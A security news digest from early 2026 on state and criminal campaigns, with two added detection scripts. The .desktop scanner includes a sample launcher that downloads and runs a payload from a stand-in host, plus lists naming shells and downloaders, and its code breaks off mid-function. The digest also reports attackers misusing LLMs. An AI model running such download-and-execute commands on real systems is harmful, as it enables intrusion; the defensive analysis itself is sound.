The Lazarus Group, a North Korea-linked threat actor, has expanded its operations to target European defense companies in 2025, leveraging a coordinated Operation DreamJob campaign. The attack involved fake recruitment lures and the deployment of various malware, including the ScoringMathTea RAT. This campaign follows earlier attacks on a decentralized finance (DeFi) organization in 2024, where the group deployed multiple cross-platform malware variants, including PondRAT, ThemeForestRAT, and RemotePE. In 2026, North Korean hackers have been observed using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector. The threat actor's goal is financial, as suggested by the role of the tools used in an attack on a fintech company investigated by Google's Mandiant researchers. The attack had a strong social engineering component, with the victim being contacted over Telegram from a compromised executive account. The hackers used a Calendly link to a spoofed Zoom meeting page and showed a deepfake video of a CEO to facilitate the attack. Mandiant researchers found seven distinct macOS malware families attributed to UNC1069, a threat group they've been tracking since 2018. UNC1069 has been active since at least April 2018 and is also tracked under the monikers CryptoCore and MASAN. The group has used generative AI tools like Gemini to produce lure material and other messaging related to cryptocurrency. They have attempted to misuse Gemini to develop code to steal cryptocurrency and have leveraged deepfake images and video lures mimicking individuals in the cryptocurrency industry. The group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry since at least 2023, targeting centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. 
In the latest intrusion documented by Google's threat intelligence division, UNC1069 deployed as many as seven unique malware families, including several new malware families such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The attack involved a social engineering scheme using a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim. The group used a fake website masquerading as Zoom to deceive victims and reused videos of previous victims to deceive new victims. The attack proceeded with a ClickFix-style troubleshooting command to deliver malware, leading to the deployment of various malicious components designed to gather system information, provide hands-on keyboard access, and steal sensitive data. Additionally, the Lazarus Group has been active since May 2025 with a campaign codenamed graphalgo, involving malicious packages in npm and PyPI repositories. Developers are targeted via social platforms like LinkedIn, Facebook, and Reddit. The campaign includes a fake company named Veltrix Capital in the blockchain and cryptocurrency trading space. Malicious packages are used to deploy a remote access trojan (RAT) that fetches and executes commands from an external server. The RAT supports commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files. The command-and-control (C2) communication is protected by a token-based mechanism. The campaign checks for the MetaMask browser extension, indicating a focus on cryptocurrency theft. A malicious npm package called "duer-js" was found to harbor a Windows information stealer called Bada Stealer, capable of gathering Discord tokens, passwords, cookies, autofill data, cryptocurrency wallet details, and system information. 
Another malware campaign weaponizes npm to extort cryptocurrency payments from developers during package installation, blocking installation until victims pay 0.1 USDC/ETH to the attacker's wallet.

GPUGate Malware Campaign Targets IT Firms in Western Europe

Updated: 12.02.2026 16:25 · First: 08.09.2025 18:02 · 📰 8 src / 20 articles

The **GPUGate malware campaign**, now linked to the **AMOS infostealer**, continues to evolve with increasingly sophisticated social engineering tactics, targeting macOS users through **fake AI assistant ecosystems, GitHub repositories, and malvertising**. A new campaign, **ClawHavoc**, exploits the OpenClaw and ClawHub AI assistant platform by poisoning its skill marketplace with malicious add-ons (e.g., crypto tools, productivity utilities) that deploy AMOS malware. This follows earlier waves using **fake GitHub repositories, Google Ads, and ClickFix techniques** to distribute AMOS and Odyssey stealers, which harvest credentials, crypto wallets, browser sessions, and system data. The campaign, active since at least **April 2023**, has expanded from traditional phishing and trojanized installers to **abusing AI hype, supply-chain weaknesses, and trusted platforms** (e.g., ChatGPT shared chats, Homebrew, LogMeIn). Threat actors—likely Russian-speaking—operate AMOS as a **Malware-as-a-Service (MaaS)**, with stolen logs sold in underground markets to fuel account takeovers, fraud, and ransomware. The latest ClawHavoc campaign underscores the shift toward **high-impact distribution channels** where weak marketplace vetting enables large-scale infections. Organizations are advised to monitor for suspicious Terminal activity, inspect network egress for exfiltration, and educate users on **ClickFix-style social engineering** and unverified AI tool extensions.

World Leaks Ransomware Group Deploys Custom RustyRocket Malware

Updated: · First: 12.02.2026 15:30 · 📰 1 src / 1 articles

World Leaks, a data extortion group, has added a new malware called RustyRocket to its arsenal. This sophisticated tool, written in Rust, targets both Windows and Linux environments, enabling stealthy data exfiltration and proxy traffic. The malware uses multi-layered encryption and requires a pre-encrypted configuration at runtime, making it difficult to detect. World Leaks has been active since early 2025, gaining initial access through social engineering, stolen credentials, or exposed infrastructure. The group has targeted high-profile companies, including Nike, and has been known to expose stolen data if ransom demands are not met.

Notepad Markdown Link Command Injection Vulnerability (CVE-2026-20841)

Updated: · First: 12.02.2026 13:51 · 📰 1 src / 1 articles

Microsoft has patched a command injection flaw (CVE-2026-20841, CVSS score: 8.8) in Notepad for Windows 11. The vulnerability allows remote code execution when users click malicious links in Markdown files. The flaw was exploited by creating Markdown files with 'file://' links to executable files or special URIs to run arbitrary payloads. The issue was fixed in the February 2026 Patch Tuesday update. The vulnerability could execute code in the context of the user opening the Markdown file, granting attackers the same permissions as that user.

AI Skills Exposed as New Attack Surface for Data Theft and Sabotage

Updated: · First: 12.02.2026 12:45 · 📰 1 src / 1 articles

TrendAI has identified AI skills, which combine human-readable text with LLM-executable instructions, as a dangerous new attack surface. These skills, used to scale AI operations, pose risks of data theft, sabotage, and disruption. Attackers exploiting these skills could access sensitive organizational data and decision-making logic, leading to potential breaches in various sectors. The risks are particularly acute for AI-enabled SOCs, where injection attacks and detection blind spots are major concerns. TrendAI recommends an eight-phase kill chain model to detect and mitigate threats from unstructured text data, emphasizing the need for skills integrity monitoring and anomaly detection.

CTEM Adoption Divide: 84% of Security Programs Lagging

Updated: · First: 12.02.2026 12:30 · 📰 1 src / 1 articles

A 2026 market intelligence study reveals a significant divide in enterprise security programs based on Continuous Threat Exposure Management (CTEM) adoption. Organizations implementing CTEM show 50% better attack surface visibility and 23-point higher solution adoption. Only 16% of surveyed enterprises have adopted CTEM, while 84% lag behind. The study highlights the importance of CTEM in managing complex attack surfaces and the challenges in gaining organizational buy-in.

Accelerated Exploitation of New Vulnerabilities in 2025

Updated: 12.02.2026 11:30 · First: 13.11.2025 13:30 · 📰 2 src / 4 articles

In 2025, approximately 50 to 61 percent of newly disclosed vulnerabilities were weaponized within 48 hours, driven by automated attack systems. The time to exploit (TTE) dropped from 745 days in 2020 to 44 days in 2025, with n-day exploits representing over 80% of the CVEs listed in the VulnDB database. Attackers exploit the delay between vulnerability disclosure and patch deployment, which often follows a slower, human-driven process. The traditional patching cadence is no longer sustainable as attackers use AI and automation to rapidly weaponize vulnerabilities, while defenders struggle to keep up. The exploitation economy operates at machine speed, with threat actors leveraging automated scripts, AI, and dark web forums to quickly develop and distribute exploits. Defenders face challenges due to the need for near-perfect stability and the risk of service interruptions, which attackers do not consider. To mitigate this, organizations must transition to automated, policy-driven remediation to close the gap between vulnerability disclosure and patch deployment.

Apple Patches Three Zero-Day Flaws Exploited in Targeted Attacks

Updated: 12.02.2026 09:48 · First: 13.12.2025 01:23 · 📰 5 src / 8 articles

Apple has released emergency updates to address a new zero-day vulnerability (CVE-2026-20700) in dyld, which was exploited in sophisticated attacks targeting specific individuals. This flaw, along with two previously disclosed vulnerabilities (CVE-2025-43529 and CVE-2025-14174) in WebKit, was exploited in the same incidents. The flaws can lead to remote code execution and memory corruption when processing maliciously crafted web content. The affected devices include various iPhone and iPad models running versions of iOS before iOS 26, as well as Mac devices running macOS Tahoe. Apple and Google's Threat Analysis Group discovered the vulnerabilities, and Google has also patched the same flaw (CVE-2025-14174) in Google Chrome, indicating coordinated disclosure. While the attacks were highly targeted, users are advised to update their devices promptly to mitigate ongoing risks. With these updates, Apple has now patched nine zero-day vulnerabilities that were exploited in the wild in 2025 and one in 2026.

Exploitation of Ivanti EPMM Vulnerabilities (CVE-2025-4427, CVE-2025-4428) Leads to Malware Deployment

Updated: 12.02.2026 09:32 · First: 19.09.2025 07:10 · 📰 7 src / 9 articles

Two malware strains were discovered in an organization's network after attackers exploited two zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM). The vulnerabilities, CVE-2025-4427 and CVE-2025-4428, allow for authentication bypass and remote code execution, respectively. Attackers used these flaws to gain access to the EPMM server, execute arbitrary code, and maintain persistence. The attack began around May 15, 2025, following the publication of a proof-of-concept exploit. The malware sets include loaders that enable arbitrary code execution and data exfiltration. The vulnerabilities affect Ivanti EPMM development branches 11.12.0.4, 12.3.0.1, 12.4.0.1, and 12.5.0.0 and their earlier releases. A China-nexus espionage group was leveraging the vulnerabilities since at least May 15, 2025. The threat actor targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The malware sets include distinct loaders with the same name, and malicious listeners that allow injecting and running arbitrary code on the compromised system. The threat actor delivered the malware through separate HTTP GET requests in segmented, Base64-encoded chunks. Organizations are advised to update their EPMM instances, monitor for suspicious activity, and implement access restrictions to prevent unauthorized access to mobile device management systems. Ivanti has disclosed two additional critical vulnerabilities, CVE-2026-1281 and CVE-2026-1340, which were exploited in zero-day attacks. These code-injection vulnerabilities allow remote attackers to execute arbitrary code on vulnerable devices without authentication. Ivanti has released RPM scripts to mitigate the vulnerabilities and advises applying them as soon as possible. The vulnerabilities will be permanently fixed in EPMM version 12.8.0.0, scheduled for release later in Q1 2026. 
CISA has added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation. The vulnerabilities affect EPMM versions 12.5.0.0 and prior, 12.6.0.0 and prior, and 12.7.0.0 and prior (Fixed in RPM 12.x.0.x), and EPMM 12.5.1.0 and prior and 12.6.1.0 and prior (Fixed in RPM 12.x.1.x). The RPM patch does not survive a version upgrade and must be reapplied if the appliance is upgraded to a new version. The vulnerabilities affect the In-House Application Distribution and the Android File Transfer Configuration features and do not affect other products, including Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), or Ivanti Sentry. Successful exploitation of the EPMM appliance will enable arbitrary code execution on the appliance and allow lateral movement to the connected environment. EPMM contains sensitive information about devices managed by the appliance. Legitimate use of the capabilities will result in 200 HTTP response codes in the Apache Access Log, whereas successful or attempted exploitation will cause 404 HTTP response codes. Customers are advised to review EPMM administrators for new or recently changed administrators, authentication configuration, new push applications for mobile devices, configuration changes to applications, new or recently modified policies, and network configuration changes. In the event of compromise, users are advised to restore the EPMM device from a known good backup or build a replacement EPMM and then migrate data to the device. After restoring, users should reset the password of any local EPMM accounts, reset the password for the LDAP and/or KDC service accounts, revoke and replace the public certificate used for EPMM, and reset the password for any other internal or external service accounts configured with the EPMM solution. 
The Dutch Data Protection Authority (AP) and the Council for the Judiciary confirmed that their systems were impacted by cyber attacks exploiting Ivanti EPMM vulnerabilities. Work-related data of AP employees, including names, business email addresses, and telephone numbers, were accessed by unauthorized persons. The European Commission identified traces of a cyber attack that may have resulted in access to names and mobile numbers of some of its staff members. Finland's state information and communications technology provider, Valtori, disclosed a breach that exposed work-related details of up to 50,000 government employees. The attacker gained access to information used in operating the service, including names, work email addresses, phone numbers, and device details. Investigations showed that the management system did not permanently delete removed data but only marked it as deleted, potentially compromising device and user data belonging to all organizations that have used the service during its lifecycle. The European Commission's central infrastructure managing mobile devices discovered signs of a breach on January 30, 2026, which may have resulted in access to staff names and mobile numbers. The Dutch justice and security secretary confirmed that the Council for the Judiciary (Rvdr) and the Dutch Data Protection Authority (AP) were breached, with unauthorized access to work-related data of AP employees, including names, business email addresses, and telephone numbers. Finnish government ICT center Valtori discovered a breach on January 30, 2026, affecting its mobile device management service, potentially exposing details of up to 50,000 government workers. Ivanti released patches for two critical (CVSS 9.8) zero-day bugs in EPMM on January 29, 2026, noting that a very limited number of customers had been exploited at the time of disclosure. 
CVE-2026-1281 and CVE-2026-1340 are code injection flaws that could allow attackers to achieve unauthenticated remote code execution. A significant chunk of the exploitation attempts targeting a newly disclosed security flaw in Ivanti Endpoint Manager Mobile (EPMM) can be traced back to a single IP address on bulletproof hosting infrastructure offered by PROSPERO. GreyNoise recorded 417 exploitation sessions from 8 unique source IP addresses between February 1 and 9, 2026, with 83% originating from 193.24.123[.]42. The same IP address exploited three other CVEs across unrelated software, indicating the use of automated tooling. 85% of the exploitation sessions beaconed home via DNS to confirm target exploitability without deploying malware or exfiltrating data. PROSPERO is linked to another autonomous system called Proton66, which has a history of distributing desktop and Android malware. Defused Cyber reported a "sleeper shell" campaign that deployed a dormant in-memory Java class loader to compromised EPMM instances, indicative of initial access broker tradecraft. Organizations are advised to apply patches, audit internet-facing MDM infrastructure, review DNS logs for OAST-pattern callbacks, monitor for the /mifs/403.jsp path on EPMM instances, and block PROSPERO's autonomous system (AS200593) at the network perimeter level.
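As an added example (not code from the advisory, Ivanti, GreyNoise or Defused Cyber), the following script applies the two log-level indicators given above to an EPMM Apache access log: 404 responses to /mifs/rs/api/v2/ requests carrying a ?format= parameter, and any request for the /mifs/403.jsp path. The log lines are constructed; the resource name "example" and the client IPs are placeholders.

```python
"""Triage an EPMM Apache access log for the indicators described in the advisory.

Added example, not vendor code. Two rules are applied:
  1. requests under /mifs/rs/api/v2/ with a format= parameter that drew a 404
     (the advisory says legitimate use returns 200, exploitation attempts 404);
  2. any request for /mifs/403.jsp.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format: client, identity, user, [timestamp],
# "request line", status, size, "referer", "user agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

API_PREFIX = "/mifs/rs/api/v2/"   # endpoint named in the advisory
ERROR_PAGE = "/mifs/403.jsp"      # path the advisory says to monitor

# Constructed sample log. "example" is a placeholder resource name and the
# client addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Feb/2026:09:00:01 +0000] "GET /mifs/rs/api/v2/example?format=json HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Feb/2026:09:00:05 +0000] "GET /mifs/rs/api/v2/example?format=x HTTP/1.1" 404 0 "-" "python-requests/2.31"
198.51.100.7 - - [12/Feb/2026:09:00:06 +0000] "GET /mifs/403.jsp HTTP/1.1" 200 1024 "-" "python-requests/2.31"
192.0.2.11 - - [12/Feb/2026:09:01:00 +0000] "GET /mifs/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2026:09:02:13 +0000] "GET /mifs/rs/api/v2/example?format=x HTTP/1.1" 404 0 "-" "curl/8.4.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return the list of indicator names this request matches (empty means benign)."""
    reasons = []
    if (entry["path"].startswith(API_PREFIX)
            and "format" in entry["query"]
            and entry["status"] == 404):
        reasons.append("404 to /mifs/rs/api/v2/ request with format= parameter")
    if entry["path"] == ERROR_PAGE:
        reasons.append("request for /mifs/403.jsp")
    return reasons


def triage(log_text):
    """Return the suspicious entries from a log, each with its matched reasons."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:          # skip lines in another format or truncated lines
            continue
        reasons = classify(entry)
        if reasons:
            entry["reasons"] = reasons
            findings.append(entry)
    return findings


def source_counts(findings):
    """Suspicious request count per client IP, most active source first."""
    return Counter(f["ip"] for f in findings).most_common()


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:15} {f['status']} {f['path']:28} {'; '.join(f['reasons'])}")
    print("per-source:", source_counts(hits))
```

The 200 response to a format= request on the first line is left alone on purpose, since the advisory describes that status as the legitimate-use case; a real deployment would feed the findings into the administrator and configuration review the advisory calls for.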

State-Backed Hackers Abuse AI Models for Advanced Cyber Attacks

Updated: 12.02.2026 09:00 · First: 05.11.2025 16:59 · 📰 4 src / 8 articles

Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's LLM Gemini to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware is in a development or testing phase and is assessed to be financially motivated. PromptSteal is a data miner written in Python that queries the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. State-backed hackers from China (APT31, Temp.HEX), Iran (APT42), North Korea (UNC2970), and Russia have used Gemini AI for all stages of an attack, including reconnaissance, phishing lure creation, C2 development, and data exfiltration. Chinese threat actors used Gemini to automate vulnerability analysis and provide targeted testing plans against specific US-based targets. Iranian adversary APT42 leveraged Gemini for social engineering campaigns and to speed up the creation of tailored malicious tools. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses. Various threat actors, including those from China, Iran, and North Korea, have been observed abusing AI models like Gemini across different stages of the attack lifecycle. 
The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation.

Microsoft October 2025 Patch Tuesday fixes 6 zero-days, 183 flaws

Updated: 12.02.2026 01:15 · First: 14.10.2025 21:02 · 📰 10 src / 18 articles

Microsoft's October 2025 Patch Tuesday marked the end of free security updates for Windows 10, addressing 183 vulnerabilities, including six zero-days, with the final cumulative update **KB5066791**. The update also introduced critical fixes for components like Windows SMB Server, Microsoft SQL Server, and Remote Access Connection Manager, alongside third-party vulnerabilities in AMD EPYC processors and IGEL OS. Separately, the **February 2026 Patch Tuesday** update fixed **CVE-2026-20841**, a high-severity remote code execution flaw in **Windows 11 Notepad** that allowed attackers to execute arbitrary programs via malicious Markdown links without security warnings. The flaw, affecting Notepad versions 11.2510 and earlier, exploited improper command neutralization to launch unverified protocols (e.g., `file://`, `ms-appinstaller://`). Microsoft mitigated the risk by adding execution warnings for non-HTTP(S) URIs, with updates distributed automatically via the Microsoft Store. Prior milestones included out-of-band patches for a critical **WSUS vulnerability (CVE-2025-59287)** with public exploit code, smart card authentication issues caused by cryptographic service changes, and a **RasMan zero-day** (DoS vulnerability) affecting all Windows versions. Windows 10 reached end-of-life, with Extended Security Updates (ESU) available for purchase, while Exchange Server 2016/2019 and Skype for Business 2016 also ended support. The October 2025 update remains the largest on record, with 183 CVEs pushing Microsoft's annual vulnerability count past 1,021.

Multi-Stage AitM Phishing and BEC Campaigns Target Energy Sector

Updated: 11.02.2026 23:53 · First: 23.01.2026 10:25 · 📰 3 src / 5 articles

Microsoft has identified a multi-stage adversary-in-the-middle (AitM) phishing and business email compromise (BEC) campaign targeting organizations in the energy sector. The attackers abused SharePoint file-sharing services to deliver phishing payloads and created inbox rules to maintain persistence and evade detection. The campaign involved leveraging compromised internal identities to conduct large-scale phishing attacks within and outside the victim organizations. Additionally, the AgreeTo Outlook add-in was hijacked and turned into a phishing kit, stealing over 4,000 Microsoft account credentials. The threat actor deployed a fake Microsoft sign-in page, password collection page, exfiltration script, and redirect, exploiting the add-in's ReadWriteItem permissions. This is the first known instance of malware found on the official Microsoft Marketplace. The add-in was abandoned by its developer and the attacker exploited the abandoned domain to serve the phishing kit. The incident highlights the need for better monitoring of add-ins and their associated URLs.

Crazy Ransomware Gang Abuses Employee Monitoring and Remote Support Tools

Updated: · First: 11.02.2026 21:29 · 📰 1 src / 1 articles

The Crazy ransomware gang has been observed abusing legitimate employee monitoring software (Net Monitor for Employees Professional) and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment. The attackers used these tools to gain full interactive access to compromised systems, transfer files, execute commands, and monitor system activity in real time. They also attempted to disable Windows Defender and set up monitoring rules to detect cryptocurrency-related activities and remote access tools. The use of multiple remote access tools provided redundancy for the attackers, ensuring they retained access even if one tool was discovered or removed. The breaches were enabled through compromised SSL VPN credentials, highlighting the need for organizations to enforce MFA on all remote access services.

JokerOTP MFA phishing-as-a-service dismantled, third suspect arrested

Updated: · First: 11.02.2026 21:14 · 📰 1 src / 1 articles

The Netherlands Police arrested a 21-year-old man from Dordrecht for selling access to the JokerOTP phishing automation tool, which intercepts one-time passwords (OTPs) to hijack accounts. The arrest is part of a three-year investigation that led to dismantling the JokerOTP phishing-as-a-service (PhaaS) operation in April 2025. The service caused at least $10 million in financial losses across 28,000 attacks in 13 countries. The seller advertised access via Telegram, allowing cybercriminals to automate calls to victims and capture sensitive data. The tool targeted users of PayPal, Venmo, Coinbase, Amazon, and Apple. The investigation is ongoing, with dozens of buyers identified for prosecution.

Wazuh Enhances Cyber Resilience with Advanced Detection and Response Capabilities

Updated: · First: 11.02.2026 19:40 · 📰 1 src / 1 articles

Wazuh, a SIEM and XDR platform, enhances cyber resilience through comprehensive visibility, early detection of suspicious activity, automated incident response, and AI-driven security analysis. It supports various environments, including virtualized, on-premises, cloud-based, and containerized systems, and integrates advanced AI models for improved threat detection and response. The platform also focuses on improving IT hygiene and security posture through continuous asset visibility, vulnerability detection, and configuration assessment.

GrayBravo Expands CastleLoader Malware Operations with Four Threat Clusters

Updated: 11.02.2026 19:02 · First: 05.09.2025 17:07 · 📰 5 src / 7 articles

GrayBravo, previously tracked as TAG-150, has developed CastleRAT, a remote access trojan available in both Python and C variants. The threat actor is characterized by rapid development cycles, technical sophistication, and an expansive, evolving infrastructure. GrayBravo has been active since at least March 2025, using CastleLoader to deliver various secondary payloads, including other RATs, information stealers, and loaders. CastleRAT is part of a multi-tiered infrastructure and uses Steam Community profiles as dead drop resolvers for command-and-control (C2) servers. The C variant of CastleRAT includes additional functionalities such as keylogging, screenshot capture, and cryptocurrency clipping. The threat actor employs phishing attacks and fraudulent GitHub repositories to initiate infections. Recent developments include the discovery of TinyLoader, TinkyWinkey, and Inf0s3c Stealer, which are used to deliver additional malware and steal information. CastleLoader has been linked to a Play Ransomware attack against a French organization, and GrayBravo operates with a limited and sophisticated user base, likely promoting its services within closed circles. Four distinct threat activity clusters have been observed leveraging CastleLoader: TAG-160, TAG-161, and two unnamed clusters. TAG-160 targets the logistics sector using phishing and ClickFix techniques, while TAG-161 uses Booking.com-themed ClickFix campaigns to distribute CastleLoader and Matanbuchus 3.0. The third cluster uses infrastructure impersonating Booking.com in conjunction with ClickFix and Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. The fourth cluster uses malvertising and fake software update lures masquerading as Zabbix and RVTools to distribute CastleLoader and NetSupport RAT. GrayBravo leverages a multi-tiered infrastructure to support its operations, including Tier 1 victim-facing C2 servers and multiple VPS servers as backups. 
A surge in LummaStealer infections has been observed, driven by social engineering campaigns leveraging the ClickFix technique to deliver the CastleLoader malware. LummaStealer, also known as LummaC2, is an infostealer operation running as a malware-as-a-service (MaaS) platform that was disrupted in May 2025 when multiple tech firms and law enforcement authorities seized 2,300 domains and the central command structure supporting the malicious service. Although the law enforcement operation severely disrupted the LummaStealer activity, the MaaS operation started to resume in July 2025. A new report from cybersecurity company Bitdefender warns that LummaStealer operations have scaled significantly between December 2025 and January 2026, now being delivered through a malware loader called CastleLoader, and increasingly relying on ClickFix techniques.

Aisuru botnet conducts record-breaking DDoS attacks, targeting U.S. ISPs and Microsoft Azure

Updated: 11.02.2026 18:08 · First: 02.09.2025 18:52 · 📰 18 src / 34 articles

The **Aisuru/Kimwolf botnet ecosystem** continues to evolve, now **disrupting critical anonymity infrastructure** alongside its record-breaking DDoS campaigns. In **February 2026**, Kimwolf operators **accidentally crippled the I2P anonymity network** by attempting to onboard **700,000 infected devices** as nodes, overwhelming the network’s typical **15,000–20,000-device capacity** and triggering a **Sybil attack** that halved I2P’s functionality. This follows the botnet’s **31.4 Tbps DDoS attack** (November 2025) and **holiday-themed "The Night Before Christmas" campaign** (December 19, 2025), which peaked at **24 Tbps, 9 Bpps, and 205 Mrps**—part of a **100% YoY increase in DDoS volume** (47.1 million attacks mitigated in 2025). With **over 6 million infected devices** (1–4M IoT for Aisuru; **>2M Android TVs/boxes** for Kimwolf), the botnets blend **hyper-volumetric DDoS** with **residential proxy monetization**, targeting sectors beyond gaming to include **telecom, IT, finance, AI, and now anonymity networks**. The **January 2026 takedown of IPIDEA**—a key proxy enabler—reduced millions of exit nodes, but **persistent infections** and **new evasion tactics** (e.g., **I2P/Tor C2 experimentation, ENS-based domains**) highlight the botnets’ **adaptive resilience**. Despite **internal operator conflicts** reducing Kimwolf’s scale by **600,000+ devices**, the ecosystem remains a **systemic risk to global internet stability, enterprise security, and privacy infrastructure**.

Transparent Tribe Targets Indian Government with Dual-Platform Malware Campaign

Updated: 11.02.2026 16:52 · First: 22.08.2025 21:35 · 📰 6 src / 16 articles

APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since June 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration, persistent espionage access, and includes anti-debugging and anti-sandbox checks. The malware also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server via a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, becoming more evasive and sophisticated. The campaign uses dedicated staging servers for malware distribution, transitioning from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution. The campaign is part of a broader trend of targeted activity by South and East Asian threat actors, reflecting a trend toward purpose-built malware and infrastructure. Indian government entities have been targeted in two campaigns codenamed Gopher Strike and Sheet Attack. Gopher Strike leveraged phishing emails to deliver PDF documents with a blurred image and a fake Adobe Acrobat Reader DC update dialog. The campaign uses server-side checks to prevent automated URL analysis tools from fetching the ISO file, ensuring delivery only to intended targets in India. The malicious payload is a Golang-based downloader called GOGITTER, which creates a VBScript file to fetch commands from C2 servers. 
GOGITTER sets up persistence using a scheduled task to run the VBScript file every 50 minutes. GOGITTER downloads a ZIP file from a private GitHub repository and executes a lightweight Golang-based backdoor called GITSHELLPAD. GITSHELLPAD polls the C2 server every 15 seconds for commands and supports six different commands including cd, run, upload, and download. The results of command execution are stored in a file called "result.txt" and uploaded to the GitHub account. The threat actor also downloads RAR archives containing utilities to gather system information and drop GOSHELL, a bespoke Golang-based loader. GOSHELL's size was artificially inflated to approximately 1 gigabyte to evade detection by antivirus software. GOSHELL only executes on specific hostnames by comparing the victim's hostname against a hard-coded list. APT36 and SideCopy are launching cross-platform RAT campaigns against Indian entities using malware families like Geta RAT, Ares RAT, and DeskRAT. The campaigns use phishing emails with malicious attachments or download links to deliver the malware, which provides persistent remote access, system reconnaissance, data collection, and command execution. Geta RAT supports various commands including system information collection, process enumeration, credential gathering, and file operations. Ares RAT is a Python-based RAT that can run commands issued by the threat actor. DeskRAT is delivered via a rogue PowerPoint Add-In file with embedded macros. The campaigns target Indian defense, government, and strategic sectors, demonstrating a well-resourced, espionage-focused threat actor deliberately targeting these sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure.
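The Linux half of the campaign above hinges on a `.desktop` launcher whose `Exec=` field runs a shell pipeline instead of opening the document its name and icon advertise. The following is an added defender-side example, not code from the report or from any vendor: a heuristic scanner that parses the `[Desktop Entry]` group and flags launchers whose `Exec=` line spawns a shell, downloads content, marks a file executable, touches hidden or temp paths, or pretends to be a document while opening none. The two sample files, the `example.invalid` URL, and the indicator thresholds are all constructed for illustration.

```python
"""Heuristic scanner for document-themed .desktop launchers (added example).

Assumptions (not from the original report): the indicator list below is a
starting heuristic, and the two sample files are constructed fixtures.
"""
import re
import shlex
from dataclasses import dataclass, field

# Constructed sample: a launcher that genuinely opens a PDF.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Quarterly Report
Exec=xdg-open /home/user/Documents/report.pdf
Icon=application-pdf
Terminal=false
"""

# Constructed sample: a launcher named like a PDF whose Exec= is a downloader chain.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Exec=bash -c "curl -s http://staging.example.invalid/up -o /tmp/.u && chmod +x /tmp/.u && /tmp/.u &"
Icon=application-pdf
Terminal=false
"""

SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
HIDDEN_OR_TMP = re.compile(r"(^|\s)(/tmp/|/var/tmp/|/dev/shm/|~/\.)")
CHMOD_EXEC = re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b")
DOC_SUFFIXES = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")


@dataclass
class Finding:
    path: str
    indicators: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Two independent indicators are required to keep false positives low.
        return len(self.indicators) >= 2


def parse_desktop(text: str) -> dict[str, str]:
    """Minimal parser: key=value pairs inside the [Desktop Entry] group only."""
    entries: dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries


def analyse(path: str, text: str) -> Finding:
    """Return a Finding listing every heuristic the launcher's Exec= line trips."""
    entry = parse_desktop(text)
    finding = Finding(path)
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        finding.indicators.append("unparseable Exec= line")
        return finding
    if not argv:
        return finding

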